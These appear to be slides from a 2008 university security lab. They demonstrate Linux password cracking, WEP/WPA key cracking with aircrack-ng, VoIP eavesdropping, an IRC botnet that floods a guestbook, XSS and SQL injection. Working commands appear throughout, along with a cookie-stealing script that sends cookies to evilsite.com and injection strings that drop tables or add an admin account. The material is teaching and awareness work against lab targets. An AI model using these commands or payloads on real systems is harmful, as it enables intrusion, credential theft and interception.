Practical Security Lab – IPICS 2008

1

Chair Management

of Information Security

IPICS 2008

Practical Security Lab

Dominik Herrmann and Florian Scheuer

Prof. Dr. Hannes Federrath

Chair for Management of Information Security

Practical Security Lab – IPICS 2008

2

Chair Management

of Information Security

Agenda

ƒ

Demonstrations

-

Breaking Linux Logon Passwords

-

Brute Force Cracking WEP/WPA Keys

-

Eavesdropping on a VoIP Call

-

Setting Up a Botnet

ƒ

Web security exercises

-

URL Tampering

-

SQL Injections

-

Cross Site Scripting

Practical Security Lab – IPICS 2008

3

Chair Management

of Information Security

Passwords are the foundation of today’s security

ƒ

Used for authenticating users in various systems

ƒ

Have to choose strong passwords which cannot be guessed easily

ƒ

Poor passwords: password, 12345, admin, summer08

ƒ

Good passwords: gD3jc5Xfg, …

ƒ

Recommendations

ƒ

Minimum length (e.g. 8 characters)

ƒ

Not in dictionary

ƒ

Include letters, digits and special characters (24DQ,17/Gt)

ƒ

Feasibility of cracking passwords (e.g. 8 characters: A-Z, a-z, 0-9)

ƒ

(26+26+10)

8

= 2.18 * 10

14

possibilities

ƒ

With 1000 trials/sec cracking will take 6,923 years (worst case)

Practical Security Lab – IPICS 2008

4

Chair Management

of Information Security

Challenge: Create awareness for password security

Practical Security Lab – IPICS 2008

5

Chair Management

of Information Security

Breaking Linux Logon Passwords

ƒ

Linux logon passwords are usually stored in /etc/shadow

ƒ

But: passwords are not stored in the clear

ƒ

Instead salted hashes are stored

ƒ

Only superuser (root) can read/modify password file

ƒ

But: if you have physical access to the machine, you can boot from
CD and circumvent any protection of the operating system

ƒ

You can either

ƒ

overwrite the unknown password and set a new one, or

ƒ

break the existing password

ƒ

We will demonstrate breaking Linux passwords with
the grml Linux Live CD

Practical Security Lab – IPICS 2008

6

Chair Management

of Information Security

Demonstration: Breaking Linux Logon Passwords

ƒ

Boot with grml Live CD (hit ENTER on the boot: prompt)

ƒ

Wait until grml-quickconfig comes up (hit q to enter shell)

ƒ

mount the root partition of the installed Linux system

mount /dev/hda1

ƒ

Have a look at password file:

cat /mnt/hda1/etc/shadow

ƒ

Use john to crack the password (using incremental mode):

john -incremental /mnt/hda1/etc/shadow

ƒ

Password will be displayed after a short while

(barki74)

Practical Security Lab – IPICS 2008

7

Chair Management

of Information Security

Cracking W-LAN keys

ƒ

WEP, Wired Equivalent Privacy (1999)

ƒ

RC4 stream cipher with key length 64-256 bits

ƒ

considered insecure today

ƒ

WPA/WPA2, Wi-Fi Protected Access (2003)

ƒ

addresses issues of weak design of WEP

ƒ

security depends on strength of password (up to 63 characters)

Accessing encrypted W-LAN using Backtrack Live Linux CD

ƒ

focused on penetration testing

ƒ

contains tools for cracking W-LAN keys

airodump-ng, aircrack-ng,
packetforge-ng, aireplay-ng

Source: http://www.remote-exploit.org/backtrack.html

Practical Security Lab – IPICS 2008

8

Chair Management

of Information Security

Attacks on WEP keys 1/2

ƒ

Key space for WEP-128: about 10

31

keys

Æ too big for brute force attack

ƒ

Attacks exploit security flaws of WEP to reduce search space

ƒ

Several variants exist:

ƒ

Attack on weak RC4 keys (FMS: Fluhrer, Mantin, Shamir)

needs at least 5-10 million packets to retrieve WEP-128 key

ƒ

Improvement: passive statistical attack (KoreK)

needs at least 500,000 packets

ƒ

Further improvement (PTW: Tews, Pychkine, Weinmann)

work with as few as 40,000 packets

Practical Security Lab – IPICS 2008

9

Chair Management

of Information Security

Attacks on WEP keys 2/2

ƒ

Problem: sniffing large number of packets may take very long

Æ Use an active attack: inject forged packets into the network:

ƒ

We will use ARP packets to increase network traffic

ƒ

How can we build encrypted ARP packets?
Æ Use fragmentation attack to recover RC4 keystream
Æ Create a valid ARP packet with recovered keystream

ƒ

WEP has no replay detection/prevention
Æ Can inject 1 packet multiple times

Source: http://www.aircrack-ng.org/doku.php?id=fragmentation

Practical Security Lab – IPICS 2008

10

Chair Management

of Information Security

Demonstration: Cracking WEP Keys 1/3

ƒ

Enable monitoring mode of wireless adapter to receive all packets

airmon-ng start eth0 <channel-id>

ƒ

Initiate a fake authentication to connect to the access point

aireplay-ng -1 6000 -q 10 -o 1 -e USR8054 -a 00:c0:49:13:31:12

eth0

-1 6000

re-authenticate every 6000 seconds

-q 10

emit a keep-alive packet every 10 seconds

-e

ESSID of access point

-a

BSSID of access point

Practical Security Lab – IPICS 2008

11

Chair Management

of Information Security

Demonstration: Cracking WEP Keys 2/3

ƒ

Start fragmentation attack to get keystream

ƒ

aireplay-ng -5 –b 00:c0:49:13:31:12

ƒ

will save keystream to fragment-….xor

ƒ

Use keystream to create an encrypted ARP packet for later injection

packetforge-ng -0 -a 00:c0:49:13:31:12 -k 255.255.255.255 -l

255.255.255.255 -y fragment-0331-104551.xor -w arp-request -
h 00:c0:ca:19:ae:12

-0

generate ARP packet

-a

BSSID of access point

-k, -l

source and destination address

-y

path to keystream file

-w

file to store generated packet

-h

MAC address of wireless adapter

Practical Security Lab – IPICS 2008

12

Chair Management

of Information Security

Demonstration: Cracking WEP Keys 3/3

ƒ

Prepare recording of packets

airodump-ng -c 11 --bssid 00:c0:49:13:31:12 -w capture eth0

-w

file for storing the captured packets

ƒ

Inject forged ARP packets

aireplay-ng -2 -r arp-request eth0

ƒ

Wait until 50,000 packets have been received, then crack the key

aircrack-ng -a 1 -e USR8054 -b 00:c0:49:13:31:12 *.cap

-a 1

crack WEP keys

-e

ESSID

-b BSSID

Practical Security Lab – IPICS 2008

13

Chair Management

of Information Security

Cracking WPA Keys

ƒ

Use airodump-ng to find BSSID and channel of the network

airodump-ng eth1

ƒ

For this attack, you have to record the authentication sequence
between a client and the access point

airodump-ng -c 11 -w handshake --bssid 00:c0:49:13:31:12 eth1

-c

the channel ID of the access point

-w

file for storing the recorded packets

ƒ

Use aircrack-ng to determine the WPA key (dictionary attack)

aircrack-ng -a2 -w ./mydictionary ./handshake-01.cap

-a2

selects mode for cracking WPA-PSK

-w

path to dictionary file

Practical Security Lab – IPICS 2008

14

Chair Management

of Information Security

Recording VoIP calls

ƒ

Voice over IP telephony utilises two protocols:

ƒ

for signalling: SIP (Session Initiation Protocol)

ƒ

for data transport: RTP (Real-time Transport Protocol)

ƒ

Common VoIP software phones do not encrypt the voice data

(Skype not affected)

ƒ

Employ ARP spoofing

ƒ

Identify IP of host and local gateway

ƒ

Re-route traffic between host and gateway over attacker’s host

ƒ

Record RTP packets and reassemble audio stream

ƒ

Out-of-the box solutions exist!

Cain and Abel for Windows

Practical Security Lab – IPICS 2008

15

Chair Management

of Information Security

Setting Up a Botnet

ƒ

Botnet: collection of software robots running autonomously

ƒ

Infected machines can be controlled remotely to

ƒ

perpetrate Denial-of-Service attacks

ƒ

send e-mail spam

ƒ

steal private credentials (e.g. logins, CC numbers)

ƒ

Well known botnets and number of bots

Kraken (400,000), Srizbi (315,000), …, Storm (85,000)

ƒ

Demonstration: a botnet based on eggdrop

ƒ

highly customizable with TCL scripts

ƒ

connects to IRC channel, awaits commands

Practical Security Lab – IPICS 2008

16

Chair Management

of Information Security

Participate in the botnet demonstration

ƒ

Download

http://www-sec.uni-r.de/ipics2008/bot.zip

to your desktop; unzip it

ƒ

Run the script livehacking.bat

ƒ

A virtual machine with Debian Linux boots up

ƒ

Log on with username hack0r and password 123456

ƒ

Start your eggdrop bot by entering ./start.sh

ƒ

The bot will log on to channel #livehacking at irc.quakenet.org and wait for
instructions (nick: bottobot).

ƒ

If there are multiple bots, they will choose unique usernames.

ƒ

Install a IRC client (e.g. mIRC) and join the channel.

ƒ

Enter !flood in the channel to instruct all bots to post an entry in the guestbook
(see

http://132.199.130.150/index.php?page=guest

)

ƒ

Stop the bot by entering Ctrl-C; enter cat eggdrop/scripts/lhurl.tcl to see the
script, which was invoked by the flood command.

Now imagine what damage a botnet with 100,000 or more

bots can do to a web server!

Practical Security Lab – IPICS 2008

17

Chair Management

of Information Security

Cross Site Scripting (XSS)

ƒ

Security vulnerability found in web applications which allow code
injection by malicious users into web sites viewed by other users.

ƒ

Can be used to bypass access controls (i.e. hijacking a session) and
for phishing (e.g. stealing credentials)

ƒ

Looking for vulnerabilities in form fields:
Insert <script>alert(‘XSS’);</script>

ƒ

You could post the following into a vulnerable guestbook to steal the
session cookies of all users visiting it:

<script>
new Image().src=“http://evilsite.com/cookies.php?

cookie?=“+encodeURI(document.cookie);

</script>

Practical Security Lab – IPICS 2008

18

Chair Management

of Information Security

SQL Injections

ƒ

Example: Web search engine

ƒ

Intended situation: user enters ipics2008

ƒ

Abuse of search functionality to inject SQL statement:

user enters ‘ OR 1=1--

$query = SELECT * FROM table WHERE field=‘$_GET[‘search‘]‘

$query = SELECT * FROM table WHERE field=‘ipics2008‘

$query = SELECT * FROM table WHERE field=‘‘ OR 1=1-- ‘

Practical Security Lab – IPICS 2008

19

Chair Management

of Information Security

Exploiting SQL Injections

ƒ

Insert additional (malicious) SQL statements:

ƒ

‘; DROP table;--

ƒ

‘; INSERT INTO users (name, password, role)

VALUES (‘BadGuy’, md5(hacked), ‘admin’);--

ƒ

Adding a UNION clause to a SELECT statement allows to retrieve
any data from the database (the current database user has access
to):

ƒ

‘ UNION SELECT password FROM users WHERE
username=‘admin’

ƒ

Database “INFORMATION_SCHEMA” holds all meta-information
about the database system, such as names of databases, tables,
columns and their data types…

ƒ

Normally each user may read the entries concerning the objects
he can access

Practical Security Lab – IPICS 2008

20

Chair Management

of Information Security

Protection against SQL Injections

ƒ

Keep in mind: All data provided and/or editable by users is not safe!

ƒ

GET parameters (e.g. in URLs)

ƒ

POST parameters

ƒ

COOKIE data

ƒ

(SESSION data)

ƒ

Use regular expressions to filter data

ƒ

Some programming languages (e.g. PHP) provide functions to
masquerade or delete control characters

ƒ

addslashes()

ƒ

htmlentities()

ƒ

…

Practical Security Lab – IPICS 2008

21

Chair Management

of Information Security

Task

ƒ

Please attack the vulnerable website at

http://132.199.130.150/